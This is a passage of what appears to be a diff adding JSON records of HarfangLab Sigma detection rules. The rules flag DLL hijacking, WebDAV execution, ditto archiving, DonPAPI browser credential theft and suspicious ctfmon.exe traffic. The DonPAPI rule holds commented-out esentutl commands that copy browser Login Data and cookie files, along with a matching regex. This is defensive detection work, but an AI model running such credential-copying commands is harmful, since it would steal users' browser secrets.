alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 
library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fltmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FLTLIB.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2cacb51e-86d2-4851-9e44-b3544e02427f", + "rule_name": "DLL Hijacking via fltmc.exe", + "rule_description": "Detects potential Windows DLL Hijacking via fltmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": 
"high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.074206Z", + "creation_date": "2026-03-23T11:45:34.074208Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.074212Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://cert.gov.ua/article/6276894", + "https://attack.mitre.org/techniques/T1021/002/" + ], + "name": "t1021_002_execution_from_webdav.yml", + "content": "title: Suspicious Execution from WebDAV Share\nid: 2ccca8c6-4fec-4f8e-a3eb-c4693b526b28\ndescription: |\n Detects the execution of a process from a WebDAV share.\n WebDAV is an unusual location for binaries to be executed from.\n Attackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\n Is it recommended to analyze the executed binary and look malicious content or behavior.\nreferences:\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2024/01/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '\\\\\\\\*@80\\\\*'\n - '\\\\\\\\*@443\\\\*'\n - '\\\\\\\\*@SSL\\\\*'\n\n 
condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28", + "rule_name": "Suspicious Execution from WebDAV Share", + "rule_description": "Detects the execution of a process from a WebDAV share.\nWebDAV is an unusual location for binaries to be executed from.\nAttackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\nIs it recommended to analyze the executed binary and look malicious content or behavior.\n", + "rule_creation_date": "2024-01-26", + "rule_modified_date": "2025-03-06", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.600335Z", + "creation_date": "2026-03-23T11:45:34.600339Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.600346Z", + "rule_level": 
"high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://wietze.github.io/blog/save-the-environment-variables", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_set.yml", + "content": "title: DLL Hijacking via set.exe\nid: 2cdfd8e4-0fb6-42ec-83a6-010700352f20\ndescription: |\n Detects potential Windows DLL Hijacking via set.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setx.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20", + "rule_name": "DLL Hijacking via set.exe", + "rule_description": "Detects potential Windows DLL Hijacking via set.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d0520f1-59a9-4523-8001-7336ef5c28cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + 
"rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618443Z", + "creation_date": "2026-03-23T11:45:34.618445Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618449Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/1560/001/" + ], + "name": "t1560_001_ditto_archive_creation.yml", + "content": "title: Archive Created via ditto\nid: 2d0520f1-59a9-4523-8001-7336ef5c28cc\ndescription: |\n Detects a suspicious archive creation using the ditto MacOS utility.\n Adversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\nreferences:\n - https://attack.mitre.org/techniques/1560/001/\ndate: 2024/06/13\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Ditto\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/ditto'\n CommandLine|contains|all:\n - ' -c'\n - ' --sequesterRsrc'\n - ' --keepParent'\n\n exclusion_airwatch:\n ProcessParentImage: '/Library/Application Support/AirWatch/hublogd'\n\n exclusion_outlook:\n ProcessParentImage: '/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d0520f1-59a9-4523-8001-7336ef5c28cc", + "rule_name": "Archive Created via ditto", + 
"rule_description": "Detects a suspicious archive creation using the ditto MacOS utility.\nAdversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\n", + "rule_creation_date": "2024-06-13", + "rule_modified_date": "2025-03-27", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection" + ], + "rule_technique_tags": [ + "attack.t1119", + "attack.t1560.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.087464Z", + "creation_date": "2026-03-23T11:45:34.087466Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.087470Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/login-securite/DonPAPI/", + "https://attack.mitre.org/techniques/T1047/", + "https://attack.mitre.org/techniques/T1555/003/" + ], + "name": 
"t1555_003_donpapi_browser_credentials.yml", + "content": "title: Browser Credentials Gathered via DonPAPI\nid: 2d125387-a98b-4b47-843e-3e6a3fb7b5eb\ndescription: |\n Detects browser credential gathering via a legacy version of the DonPAPI tool.\n DonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/login-securite/DonPAPI/\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/03/05\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # CommandLine:\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y 
?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\* /d ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n ProcessParentName: wmiprvse.exe\n ProcessName: 'cmd.exe'\n CommandLine|re: '.*cmd.exe /Q /c esentutl.exe /y ([^/]*(/d )?){2}.tmp'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb", + "rule_name": "Browser Credentials Gathered via DonPAPI", + "rule_description": "Detects browser credential gathering via a legacy version of the DonPAPI tool.\nDonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication 
logs.\n", + "rule_creation_date": "2024-03-05", + "rule_modified_date": "2025-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1047", + "attack.t1555.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d20cb47-e527-4738-b5ba-ab12cd7da516", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.096927Z", + "creation_date": "2026-03-23T11:45:34.096929Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.096934Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_fxsunatd.yml", + "content": "title: DLL Hijacking via fxsunatd.exe\nid: 2d20cb47-e527-4738-b5ba-ab12cd7da516\ndescription: |\n Detects potential Windows DLL Hijacking via fxsunatd.exe.\n DLL hijacking takes advantage of the default Windows search order by 
positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxsunatd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\FXSAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d20cb47-e527-4738-b5ba-ab12cd7da516", + "rule_name": "DLL Hijacking via fxsunatd.exe", + "rule_description": "Detects potential Windows DLL Hijacking via fxsunatd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim 
application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d438226-15c9-4f1f-9818-560efb9ac7de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.605179Z", + "creation_date": "2026-03-23T11:45:34.605182Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.605189Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/ThePorgs/Exegol/", + 
"https://exegol.readthedocs.io/", + "https://attack.mitre.org/techniques/T1018/" + ], + "name": "t1018_silent_workstation_name_exegol.yml", + "content": "title: Activity linked to Workstation Named Exegol\nid: 2d438226-15c9-4f1f-9818-560efb9ac7de\ndescription: |\n Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://github.com/ThePorgs/Exegol/\n - https://exegol.readthedocs.io/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Exegol\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation|startswith: 'exegol-'\n - WorkstationName|startswith: 'exegol-'\n\n condition: selection\nlevel: medium\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d438226-15c9-4f1f-9818-560efb9ac7de", + "rule_name": "Activity linked to Workstation Named Exegol", + "rule_description": "Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n", + "rule_creation_date": "2025-06-04", + "rule_modified_date": "2025-06-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.discovery" + ], + 
"rule_technique_tags": [ + "attack.t1018" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.081072Z", + "creation_date": "2026-03-23T11:45:34.081075Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.081079Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/Cryptolaemus1/status/1759740446857625639", + "https://twitter.com/reecdeep/status/1759603556288459149", + "https://attack.mitre.org/techniques/T1055/", + "https://attack.mitre.org/techniques/T1571/" + ], + "name": "t1055_ctfmon_suspicious_network_communication.yml", + "content": "title: Suspicious ctfmon.exe Network Communication\nid: 2d48e659-e7f3-42cc-ab39-2bb7040a806c\ndescription: |\n Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\n This can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\n 
This technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\n It has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\n It is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\n Additionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1759740446857625639\n - https://twitter.com/reecdeep/status/1759603556288459149\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/02/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'CTFMON.EXE'\n ProcessParentCommandLine|contains: '?'\n\n filter_parent:\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TextInputManagementService'\n\n filter_ip:\n DestinationIp|cidr:\n - '0.0.0.0/8' # RFC 1122, Section 3.2.1.3 \"This\" Network*\n - '10.0.0.0/8' # RFC 1918 Private-Use Networks*\n - '127.0.0.0/8' # RFC 1122, Section 3.2.1.3 Loopback*\n - 
'169.254.0.0/16' # RFC 3927 Link Local*\n - '172.16.0.0/12' # RFC 1918 Private-Use Networks*\n - '192.0.0.0/24' # RFC 5736 IETF Protocol Assignments*\n - '192.0.2.0/24' # RFC 5737 TEST-NET-1*\n - '192.88.99.0/24' # RFC 3068 6to4 Relay Anycast*\n - '192.168.0.0/16' # RFC 1918 Private-Use Networks*\n - '198.18.0.0/15' # RFC 2544 Network Interconnect Device Benchmark Testing*\n - '198.51.100.0/24' # RFC 5737 TEST-NET-2*\n - '203.0.113.0/24' # RFC 5737 TEST-NET-3*\n - '224.0.0.0/4' # RFC 3171 Multicast*\n - '240.0.0.0/4' # RFC 1112, Section 4 Reserved for Future Use*\n - '255.255.255.255/32' # RFC 919, Section 7 Limited Broadcast*\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c", + "rule_name": "Suspicious ctfmon.exe Network Communication", + "rule_description": "Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\nThis can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\nThis technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\nIt has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\nIt is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\nAdditionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\n", + "rule_creation_date": "2024-02-23", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": 
